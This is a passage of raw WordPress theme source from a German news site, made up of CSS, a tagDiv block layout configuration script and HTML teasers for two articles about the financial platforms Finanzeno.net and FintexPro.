  1738. <style>.tdi_153 .td-image-wrap{padding-bottom:70%}.tdi_153 .entry-thumb{background-position:center 50%}.tdi_153 .td-image-container{flex:0 0 48.6%;width:48.6%;display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_153 .td-image-container,.ie11 .tdi_153 .td-image-container{flex:0 0 auto}.tdi_153 .td-module-container{flex-direction:row;border-color:#eaeaea!important}.ie10 .tdi_153 .td-module-meta-info,.ie11 .tdi_153 .td-module-meta-info{flex:1}body .tdi_153 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_153 .td-module-meta-info{padding:0 0 0 20px;display:flex;flex-direction:column;justify-content:center;border-color:#eaeaea}.tdi_153 .td-category-pos-above .td-post-category{align-self:flex-start;align-self:flex-start!important}.tdi_153 .td_module_wrap{width:50%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.rtl .tdi_153 .td_module_wrap{float:right}.tdi_153 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_153 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_153 .td-post-vid-time{display:block}.tdi_153 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa}.tdi_153 .td-post-category:not(.td-post-extra-category){display:none}.tdi_153 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_153 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_153 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_153 .td-read-more{display:none}.tdi_153 .td-author-date{display:inline}.tdi_153 .entry-review-stars{display:inline-block}.tdi_153 .td-icon-star,.tdi_153 .td-icon-star-empty,.tdi_153 .td-icon-star-half{font-size:15px}.tdi_153 .td-module-comments{display:none}.tdi_153 .td_module_wrap:nth-child(2n+1){clear:both}.tdi_153 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0;padding-bottom:0}.tdi_153 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none}.tdi_153 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_153 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_153 .td-post-author-name a{color:#000000}.tdi_153 .td-post-author-name:hover a{color:#ec3535}.tdi_153 .td-post-date,.tdi_153 .td-post-author-name span{color:#000000}.tdi_153 .td-module-meta-info,.tdi_153 .td-next-prev-wrap{text-align:left}.tdi_153 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_153 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_153 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 10px 0 0;padding:4px 6px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_153 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_153 .entry-title{margin:0 0 8px 0;font-family:PT Serif!important;font-size:26px!important;line-height:1.1!important;font-weight:600!important}.tdi_153 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_153 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}.tdi_153 .td-editor-date,.tdi_153 .td-editor-date .td-post-author-name a,.tdi_153 .td-editor-date .entry-date,.tdi_153 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_153 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_153 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_153 .td-module-meta-info{padding:0 0 0 15px}.tdi_153 .td_module_wrap{padding-left:7.5px;padding-right:7.5px;padding-bottom:7.5px;margin-bottom:7.5px;clear:none!important;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_153 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_153 .td-module-container:before{bottom:-7.5px}.tdi_153 .td-post-author-name{display:none}.tdi_153 .td_module_wrap:nth-child(2n+1){clear:both!important}.tdi_153 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_153 .td_module_wrap .td-module-container:before{display:block!important}.tdi_153 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_153 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_153 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_153 .entry-title{margin:0 0 6px 0;font-size:19px!important}@media (min-width:768px){.tdi_153 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_153 .td-image-wrap{padding-bottom:90%}.tdi_153 .td-module-meta-info{padding:0 0 0 10px}.tdi_153 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:5px;margin-bottom:5px;clear:none!important;padding-bottom:5px!important;margin-bottom:5px!important}.tdi_153 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_153 .td-module-container:before{bottom:-5px}.tdi_153 .td-post-author-name{display:none}.tdi_153 .td-icon-star,.tdi_153 .td-icon-star-empty,.tdi_153 .td-icon-star-half{font-size:10px}.tdi_153 .td_module_wrap:nth-child(2n+1){clear:both!important}.tdi_153 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_153 .td_module_wrap .td-module-container:before{display:block!important}.tdi_153 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_153 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_153 .td-module-exclusive .td-module-title a:before{margin:-2px 8px 0 0;font-size:11px!important}.tdi_153 .entry-title{margin:0 0 4px 0;font-size:17px!important}.tdi_153 .td-editor-date,.tdi_153 .td-editor-date .td-post-author-name a,.tdi_153 .td-editor-date .entry-date,.tdi_153 .td-module-comments a{font-size:12px!important}@media (min-width:768px){.tdi_153 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_153 .td-image-container{flex:0 0 100%;width:100%}.ie10 .tdi_153 .td-image-container,.ie11 .tdi_153 .td-image-container{flex:0 0 auto}.tdi_153 .td-module-container{flex-direction:column}.tdi_153 .td-image-container{display:block;order:0}.ie10 .tdi_153 .td-module-meta-info,.ie11 .tdi_153 .td-module-meta-info{flex:auto}.tdi_153 .td-module-meta-info{max-width:100%;padding:20px 0 0 0}.tdi_153 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.rtl .tdi_153 .td_module_wrap{float:right}.tdi_153 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_153 .td-module-container:before{bottom:-15px}.tdi_153 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_153 .td_module_wrap .td-module-container:before{display:block!important}.tdi_153 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_153 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_153 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_153 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_153 = new tdBlock();
  1739. block_tdi_153.id = "tdi_153";
  1740. block_tdi_153.atts = '{"modules_on_row":"eyJwaG9uZSI6IjEwMCUiLCJhbGwiOiI1MCUifQ==","limit":"2","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"54","f_title_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title_font_line_height":"1.1","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDAgMCAyMHB4IiwibGFuZHNjYXBlIjoiMCAwIDAgMTVweCIsInBvcnRyYWl0IjoiMCAwIDAgMTBweCIsInBob25lIjoiMjBweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"center","image_floated":"eyJhbGwiOiJmbG9hdF9sZWZ0IiwicGhvbmUiOiJub19mbG9hdCJ9","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjIwIiwiZGlzcGxheSI6IiJ9LCJsYW5kc2NhcGUiOnsibWFyZ2luLXRvcCI6Ii0xMCIsIm1hcmdpbi1ib3R0b20iOiIxNSIsImRpc3BsYXkiOiIifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOSwicG9ydHJhaXQiOnsibWFyZ2luLXRvcCI6Ii0yMCIsIm1hcmdpbi1ib3R0b20iOiIxMCIsImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjMwIiwiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2N30=","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"eyJhbGwiOiI3MCIsInBvcnRyYWl0IjoiOTAifQ==","all_modules_space":"eyJwaG9uZSI6IjMwIiwicG9ydHJhaXQiOiIxMCIsImFsbCI6IjIwIiwibGFuZHNjYXBlIjoiMTUifQ==","art_excerpt":"0","art_title":"eyJsYW5kc2NhcGUiOiIwIDAgNnB4IDAiLCJwb3J0cmFpdCI6IjAgMCA0cHggMCIsImFsbCI6IjAgMCA4cHggMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"","show_author":"eyJwb3J0cmFpdCI6Im5vbmUiLCJsYW5kc2NhcGUiOiJub25lIn0=","mc1_el":"10","f_title_font_family":"456","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","modules_category_padding":"0","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_category_margin":"0","modules_cat_border":"0","columns":"33.33333333%","columns_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_space1":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMiIsInBob25lIjoiMzAifQ==","hide_image3":"yes","category_ids":"","image_height1":"70","modules_space2":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE2IiwicG9ydHJhaXQiOiIxMCJ9","meta_padding2":"0","art_title1":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMCAwIDEwcHgiLCJwb3J0cmFpdCI6IjAgMCA4cHgifQ==","art_title2":"eyJhbGwiOiIwIDAgOHB4IDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIDAgNnB4IDAifQ==","f_title1_font_family":"456","f_title2_font_family":"653","f_title1_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title1_font_line_height":"1.1","f_title1_font_weight":"600","f_title2_font_weight":"600","f_title1_font_transform":"","f_title2_font_transform":"","title_txt2":"#000000","title_txt_hover2":"#f43f3f","show_excerpt2":"none","show_com2":"none","show_date2":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author2":"none","modules_category3":"","modules_category_margin1":"0","modules_category_margin2":"0","modules_category_padding1":"0","modules_category_padding2":"0","modules_cat_border1":"0","modules_cat_border2":"0","cat_bg2":"rgba(255,255,255,0)","cat_txt2":"#ec3535","author_photo_radius1":"100%","author_photo_radius2":"100%","review_size2":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta1_font_family":"653","f_meta2_font_family":"653","f_meta1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta1_font_line_height":"1","f_meta1_font_weight":"500","f_meta2_font_weight":"500","f_meta1_font_transform":"capitalize","f_meta2_font_transform":"capitalize","f_meta1_font_spacing":"-0.5","meta_info_align1":"","meta_padding1":"eyJhbGwiOiIyMHB4IDAiLCJsYW5kc2NhcGUiOiIxNXB4IDAiLCJwb3J0cmFpdCI6IjEycHggMCIsInBob25lIjoiMjBweCAwIDAifQ==","show_author1":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","show_com1":"none","show_excerpt1":"none","modules_border_size1":"eyJhbGwiOiIwIDAgMXB4IDAiLCJwaG9uZSI6IjAifQ==","show_cat1":"none","show_cat2":"none","author_photo":"yes","f_title2_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMyJ9","f_title2_font_line_height":"1.2","f_meta2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta2_font_line_height":"1","f_meta2_font_spacing":"-0.5","all_underline_color1":"","author_txt":"#000000","author_txt_hover":"#ec3535","date_txt":"#000000","all_underline_color2":"","date_txt2":"#000000","author_photo_radius":"100%","review_size":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta_font_family":"653","f_meta_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_transform":"capitalize","f_meta_font_spacing":"-0.5","image_width":"eyJhbGwiOiI0OC42IiwicGhvbmUiOiIxMDAifQ==","excl_margin":"eyJhbGwiOiItNHB4IDEwcHggMCAwIiwicG9ydHJhaXQiOiItMnB4IDhweCAwIDAifQ==","excl_padd":"4px 6px","excl_radius":"2","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","f_excl_font_transform":"uppercase","f_excl_font_weight":"600","f_excl_font_family":"653","f_excl_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTEiLCJsYW5kc2NhcGUiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_line_height":"1","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_font_spacing":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo_size":"","author_photo_space":"","show_review":"inline-block","review_space":"","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_bg_hover":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":3,"header_color":"","color_preset":"","border_top":"","class":"tdi_153","tdc_css_class":"tdi_153","tdc_css_class_style":"tdi_153_rand_style"}';
  1741. block_tdi_153.td_column_number = "3";
  1742. block_tdi_153.block_type = "td_flex_block_1";
  1743. block_tdi_153.post_count = "2";
  1744. block_tdi_153.found_posts = "71";
  1745. block_tdi_153.header_color = "";
  1746. block_tdi_153.ajax_pagination_infinite_stop = "";
  1747. block_tdi_153.max_num_pages = "36";
  1748. tdBlocksArray.push(block_tdi_153);
  1749. </script><div class="td-block-title-wrap"></div><div id=tdi_153 class="td_block_inner td-mc1-wrap">
  1750.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1751.            <div class="td-module-container td-category-pos-above">
  1752.                                    <div class="td-image-container">
  1753.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                                                                    </div>
  1754.                
  1755.                <div class="td-module-meta-info">
  1756.                                        
  1757.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  1758.                    
  1759.                                            <div class="td-editor-date">
  1760.                                                        
  1761.                                                            <span class="td-author-date">
  1762.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >Mai 6, 2024</time></span>                                                                                                        </span>
  1763.                                                    </div>
  1764.                    
  1765.                    <div class="td-excerpt">Finanzeno.net, ein führender Name im Finanzdienstleistungssektor, setzt weiterhin hohe...</div>
  1766.                    
  1767.                                    </div>
  1768.            </div>
  1769.        </div>
  1770.  
  1771.        
  1772.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1773.            <div class="td-module-container td-category-pos-above">
  1774.                                    <div class="td-image-container">
  1775.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/fintexpro/"  rel="bookmark" class="td-image-wrap " title="FintexPro verbessert Lösungen durch nahtlose Integration" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/03/FintexPro-verbessert-Loesungen-durch-nahtlose-Integration-1-696x461.png"  ></span></a></div>                                                                    </div>
  1776.                
  1777.                <div class="td-module-meta-info">
  1778.                                        
  1779.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/fintexpro/"  rel="bookmark" title="FintexPro verbessert Lösungen durch nahtlose Integration">FintexPro verbessert Lösungen durch nahtlose Integration</a></h3>
  1780.                    
  1781.                                            <div class="td-editor-date">
  1782.                                                        
  1783.                                                            <span class="td-author-date">
  1784.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-03-12T09:37:26+01:00" >März 12, 2024</time></span>                                                                                                        </span>
  1785.                                                    </div>
  1786.                    
  1787.                    <div class="td-excerpt">London, Vereinigtes Königreich - FintexPro, ein führender Anbieter von...</div>
  1788.                    
  1789.                                    </div>
  1790.            </div>
  1791.        </div>
  1792.  
  1793.        </div></div><div class="td_block_wrap td_flex_block_1 tdi_154 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_154" >
  1794. <style>.tdi_154{margin-bottom:0px!important}@media (max-width:767px){.tdi_154{margin-bottom:0px!important}}</style>
  1795. <style>.tdi_154 .td-image-wrap{padding-bottom:70%}.tdi_154 .entry-thumb{background-position:center 50%}.tdi_154 .td-module-container{flex-direction:column;border-color:#eaeaea!important}.tdi_154 .td-image-container{display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_154 .td-module-meta-info,.ie11 .tdi_154 .td-module-meta-info{flex:auto}body .tdi_154 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_154 .td-module-meta-info{padding:16px 0 0 0;border-color:#eaeaea}.tdi_154 .td_module_wrap{width:25%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.rtl .tdi_154 .td_module_wrap{float:right}.tdi_154 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_154 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_154 .td-post-vid-time{display:block}.tdi_154 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa}.tdi_154 .td-post-category:not(.td-post-extra-category){display:none}.tdi_154 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_154 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_154 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_154 .td-read-more{display:none}.tdi_154 .td-author-date{display:inline}.tdi_154 .entry-review-stars{display:inline-block}.tdi_154 .td-icon-star,.tdi_154 .td-icon-star-empty,.tdi_154 .td-icon-star-half{font-size:15px}.tdi_154 .td-module-comments{display:none}.tdi_154 .td_module_wrap:nth-child(4n+1){clear:both}.tdi_154 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0;padding-bottom:0}.tdi_154 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none}.tdi_154 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_154 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_154 .td-post-author-name a{color:#000000}.tdi_154 .td-post-author-name:hover a{color:#ec3535}.tdi_154 .td-post-date,.tdi_154 .td-post-author-name span{color:#000000}.tdi_154 .td-module-meta-info,.tdi_154 .td-next-prev-wrap{text-align:left}.tdi_154 .td-category-pos-above .td-post-category{align-self:flex-start!important}.tdi_154 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_154 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_154 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_154 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_154 .entry-title{margin:0 0 8px 0;font-family:PT Serif!important;font-size:16px!important;line-height:1.3!important;font-weight:600!important}.tdi_154 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_154 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}.tdi_154 .td-editor-date,.tdi_154 .td-editor-date .td-post-author-name a,.tdi_154 .td-editor-date .entry-date,.tdi_154 .td-module-comments a{font-family:Work 